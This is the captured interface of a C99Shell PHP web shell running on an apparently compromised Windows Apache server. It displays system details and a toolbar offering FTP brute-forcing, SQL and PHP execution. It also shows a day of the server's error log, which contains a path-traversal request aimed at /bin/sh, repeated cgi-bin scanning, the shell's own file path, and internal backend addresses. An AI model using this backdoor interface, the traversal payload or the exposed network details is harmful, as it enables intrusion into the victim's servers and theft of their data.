!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2024.06.20.log (40.5 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Thu Jun 20 00:31:41.909300 2024] [core:error] [pid 516:tid 20744] [client 139.59.102.191:58534] AH00126: Invalid URI in request POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
[Thu Jun 20 00:43:15.860919 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 00:48:32.307475 2024] [cgi:error] [pid 516:tid 20816] [client 185.191.127.212:44456] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 01:13:16.728082 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 01:22:36.363465 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 01:35:30.188224 2024] [proxy:error] [pid 516:tid 20768] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Thu Jun 20 01:35:30.188224 2024] [proxy:error] [pid 516:tid 20768] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.16) for 60s
[Thu Jun 20 01:35:30.188224 2024] [proxy_http:error] [pid 516:tid 20768] [client 201.245.192.253:50336] AH01114: HTTP: failed to make connection to backend: 172.22.1.16
[Thu Jun 20 01:35:31.155426 2024] [proxy:error] [pid 516:tid 20768] AH00940: HTTP: disabled connection for (172.22.1.16)
[Thu Jun 20 01:36:29.171928 2024] [proxy:error] [pid 516:tid 21176] AH00940: HTTP: disabled connection for (172.22.1.16)
[Thu Jun 20 01:42:50.233797 2024] [proxy:error] [pid 516:tid 21052] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Thu Jun 20 01:42:50.233797 2024] [proxy:error] [pid 516:tid 21052] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Thu Jun 20 01:42:50.233797 2024] [proxy_http:error] [pid 516:tid 21052] [client 152.61.128.50:39213] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Thu Jun 20 01:42:50.483397 2024] [proxy:error] [pid 516:tid 21052] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Jun 20 01:42:50.717398 2024] [proxy:error] [pid 516:tid 21052] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Jun 20 01:53:27.416916 2024] [cgi:error] [pid 516:tid 20816] [client 185.191.127.212:59022] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 02:10:42.790735 2024] [cgi:error] [pid 516:tid 20816] [client 45.148.10.174:47722] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 02:10:43.165135 2024] [cgi:error] [pid 516:tid 20744] [client 45.148.10.174:47724] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 02:27:12.941074 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 02:27:44.858730 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 02:27:54.858347 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 02:55:06.356013 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 02:56:04.637715 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 03:00:57.309829 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 03:07:03.504873 2024] [cgi:error] [pid 516:tid 21052] [client 185.191.127.212:59898] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 03:21:20.274978 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 03:26:16.878298 2024] [core:error] [pid 516:tid 20744] (20024)The given path is misformatted or contained invalid characters: [client 47.128.17.184:10654] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/server_privileges.php%27%20%20%20%20%20.%20PMA_URL_getCommon(array(%27username%27%20=%3E%20%20%20%20$username))%20%20%20%20%20.%20%27 HTTP/1.1 to file
[Thu Jun 20 03:30:25.995136 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 03:33:44.848685 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 03:43:56.900160 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 03:57:03.531542 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 04:08:20.760932 2024] [cgi:error] [pid 516:tid 21320] [client 185.191.127.212:47404] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 04:39:57.771063 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 04:40:29.657519 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 05:14:04.495658 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 05:17:04.909975 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 05:27:23.544662 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 05:41:27.662144 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 05:54:20.939903 2024] [cgi:error] [pid 516:tid 21288] [client 45.148.10.174:43406] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 05:54:21.283103 2024] [cgi:error] [pid 516:tid 21320] [client 45.148.10.174:43412] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 06:01:24.793647 2024] [cgi:error] [pid 516:tid 21288] [client 185.191.127.212:42256] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 06:17:14.616915 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 06:21:43.888988 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 06:28:10.582468 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 06:28:18.772482 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 06:36:54.649788 2024] [proxy:error] [pid 516:tid 20744] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Thu Jun 20 06:36:54.649788 2024] [proxy:error] [pid 516:tid 20744] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Thu Jun 20 06:36:54.649788 2024] [proxy_http:error] [pid 516:tid 20744] [client 152.61.192.232:54075] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Thu Jun 20 06:36:54.914989 2024] [proxy:error] [pid 516:tid 20744] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Jun 20 06:36:55.180189 2024] [proxy:error] [pid 516:tid 20744] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Jun 20 07:15:04.017209 2024] [cgi:error] [pid 516:tid 20832] [client 185.191.127.212:54386] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 07:33:40.479970 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 07:45:30.764818 2024] [cgi:error] [pid 516:tid 20768] [client 185.191.127.212:33210] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 07:57:40.659900 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 08:14:57.422121 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 08:37:48.586529 2024] [core:error] [pid 516:tid 21052] (20024)The given path is misformatted or contained invalid characters: [client 47.128.32.144:13778] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/%22%20.%20esc_url(%20apply_filters( HTTP/1.1 to file
[Thu Jun 20 08:38:17.259379 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 09:01:34.320833 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 09:02:17.922910 2024] [cgi:error] [pid 516:tid 20832] [client 185.191.127.212:53954] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 09:23:01.104693 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 09:23:51.336782 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 09:37:57.062067 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 09:40:56.977183 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 09:42:06.397305 2024] [cgi:error] [pid 516:tid 21488] [client 45.148.10.174:34964] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 09:42:06.756106 2024] [cgi:error] [pid 516:tid 21248] [client 45.148.10.174:34982] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 10:01:46.055777 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 10:01:46.055777 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 10:03:10.358325 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 10:24:57.437821 2024] [cgi:error] [pid 516:tid 21052] [client 185.191.127.212:33040] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 10:50:06.429471 2024] [core:error] [pid 516:tid 20920] (20024)The given path is misformatted or contained invalid characters: [client 47.128.32.227:63820] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/tbl_tracking.php%27;%20%20%20%20%20$html%20.=%20PMA_URL_getCommon(%20%20%20%20%20$url_params%20+%20array(%20%20%20%20%20%27snapshot%27%20=%3E%20%20%20%20%27true%27,%20%27version%27%20=%3E%20%20%20%20$version[%27version%27]%20%20%20%20%20)%20%20%20%20%20);%20%20%20%20%20$html%20.=%20%27 HTTP/1.1 to file
[Thu Jun 20 11:02:19.973960 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 11:06:44.472424 2024] [cgi:error] [pid 516:tid 20716] [client 185.191.127.212:34148] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 11:36:47.758592 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 11:38:09.346735 2024] [proxy_http:error] [pid 516:tid 21176] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 186.155.14.255:38163] AH01095: prefetch request body failed to 172.22.1.61:8080 (172.22.1.61) from 186.155.14.255 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml
[Thu Jun 20 11:47:35.549729 2024] [proxy_http:error] [pid 516:tid 21328] (70008)Partial results are valid but processing is incomplete: [client 186.102.91.231:2762] AH02609: read request body failed to 172.22.1.16:18080 (172.22.1.16) from 186.102.91.231 (), referer: http://localhost/
[Thu Jun 20 11:47:35.549729 2024] [proxy_http:error] [pid 516:tid 21328] [client 186.102.91.231:2762] AH01097: pass request body failed to 172.22.1.16:18080 (172.22.1.16) from 186.102.91.231 (), referer: http://localhost/
[Thu Jun 20 12:11:29.020647 2024] [cgi:error] [pid 516:tid 21248] [client 45.148.10.174:34220] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 12:11:29.363848 2024] [cgi:error] [pid 516:tid 20904] [client 45.148.10.174:34232] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 12:32:22.764649 2024] [cgi:error] [pid 516:tid 21488] [client 185.191.127.212:50316] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 13:29:08.719632 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 13:45:22.832143 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 13:53:06.496157 2024] [cgi:error] [pid 516:tid 21476] [client 185.191.127.212:54958] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 14:04:10.012122 2024] [core:error] [pid 516:tid 20716] (20024)The given path is misformatted or contained invalid characters: [client 156.59.198.136:45390] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/%3C?php%20echo%20esc_url(%20$url%20);%20?%3E HTTP/1.0 to file
[Thu Jun 20 14:05:10.493429 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 14:39:15.860821 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 14:49:32.592304 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 14:49:35.883910 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 14:50:06.881165 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 14:51:36.066521 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:08:41.597722 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:09:15.168981 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:13:04.458184 2024] [cgi:error] [pid 516:tid 20824] [client 185.191.127.212:41976] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 15:14:03.457488 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:17:23.512239 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:17:29.487050 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:20:27.608163 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:26:11.089566 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:26:21.915985 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:32:31.137433 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:38:43.369687 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:40:35.861485 2024] [cgi:error] [pid 516:tid 20824] [client 185.191.127.212:39502] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 15:45:16.521578 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:51:10.829400 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:56:19.288742 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 15:57:41.235686 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:02:30.273993 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:03:35.294908 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:04:08.710166 2024] [core:error] [pid 516:tid 20768] (20024)The given path is misformatted or contained invalid characters: [client 47.128.127.60:52120] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/%3C?php%20echo%20$theme[%27screenshot%27][0];%20?%3E HTTP/1.1 to file, referer: http://190.27.245.106/BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=themes.php&ft=html&white=1
[Thu Jun 20 16:10:05.435993 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:16:17.683847 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:22:12.085269 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:26:52.136961 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:27:27.720624 2024] [cgi:error] [pid 516:tid 21416] [client 185.191.127.212:39044] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 16:28:30.229933 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:34:54.380608 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:41:06.612862 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:47:00.905084 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:48:21.978427 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:50:50.287887 2024] [core:error] [pid 516:tid 21328] [client 172.202.158.131:48420] AH00135: Invalid method in request MGLNDD_190.27.245.106_80
[Thu Jun 20 16:53:10.126533 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:53:32.403372 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:56:10.214249 2024] [cgi:error] [pid 516:tid 21416] [client 45.148.10.174:43016] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 16:56:10.557450 2024] [cgi:error] [pid 516:tid 20832] [client 45.148.10.174:43030] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 16:56:41.913505 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 16:59:25.370592 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:05:55.496077 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:12:07.697131 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:09.921051 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:10.170651 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:11.231453 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:11.278253 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:11.683854 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:34.163493 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:36.035497 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:37.673500 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:58.967537 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:58.967537 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:58.967537 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:58.967537 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:58.967537 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:58.967537 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:58.967537 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:15:59.092337 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:00.433940 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:00.870740 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
